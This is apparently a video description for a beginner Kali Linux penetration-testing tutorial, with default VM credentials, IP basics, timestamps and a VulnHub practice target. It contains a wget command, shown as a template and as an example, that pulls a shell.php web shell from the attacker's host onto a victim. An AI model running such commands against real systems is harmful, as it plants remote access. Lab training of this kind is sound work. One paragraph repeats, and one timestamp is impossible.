
Credentials to login are:
Username: kali
Password: kali
Note: Sometimes in hacking, especially in CTF writeups you might see format like 'admin:password'. it's good to get familiar with this format as this is a common way to share credentials in infosec/pentesting.
Link: https://www.kali.org/get-kali/#kali-virtual-machines
Link: https://access.broadcom.com/default/ui/v1/signin/
To recap:
Your Public IP Address is something that identifies your home network. And is given by Your ISP (Internet Service Provider). We can change our Public IP Address by using a VPN or Tor or other alternatives.
Your Private IP Address is something that identifies your device within a LAN (Local Area Network). This can be easily changed but causes no effect from outside of Your LAN. This IP is useful when configuring, accessing devices. Like connecting remotely through SSH to our server.
Learn to use:
Basic Linux commands
Learning to read contents of files
Writing to files
Making directories
Removing directories and files
Man and Help pages
This is a full Kali Linux from A to Z.
I will teach You everything you need to navigate around Kali.
How to use Kali
Using Your first tool
Changing your default password (recommended)
Changing other users password
Opening up your Python3 Web Server
Much much more, Here are the timestamps!
TIMESTAMPS: 00:00 - Intro
03:59 - Installing Kali + VMWare
04:30 - UI Walkthrough
09:11 - Linux System Files
10:42 - Changing user pass
13:06 - Hacking Tools Showcase
20:00 - Learning Command Line
26:17 - Updating Kali
28:54 - Checking Our O/S Release
31:26 - Back To Command Line
38:09 - Wordlists showcase
39:50 - Opening up folders through CLI
40:28 - System & Useful Commands
45:20 - Text Editing (Nano)
56:18 - Linux Permissions
1:03:12 - Kali IP Addressing
1:04:51 - Using Our First Hacking Tool
1:05:14 - Using Help Menus
1:06:24 Using Nmap continued
1:10:25 - Installing Any Program/Tool on Linux
1:12:67 - Different Wordlists for different purposes
1:16:20 - Finding Any Files on Linux
Link To Download Victim (RHOST) Machine
https://www.vulnhub.com/entry/basic-pentesting-1,216/
Remember that this works both ways. On Kali we can browse files through the browser (unless we have RDP - Remote Desktop Protocol on the victim then we can use the browser too)
Shell Command: wget LHOST_IP:PORT/filename.extension
Shell Example: wget 192.168.88.130:8000/shell.php
Remember that this works both ways. On Kali we can browse files through the browser (unless we have RDP - Remote Desktop Protocol on the victim then we can use the browser too)
Shell Command: wget LHOST_IP:PORT/filename.extension
Shell Example: wget 192.168.88.130:8000/shell.php
https://www.freecodecamp.org/news/linux-how-to-add-users-and-create-users-with-useradd/
Download your ISO here -> https://www.easeus.com/system-to-go/windows-10-iso-download.html
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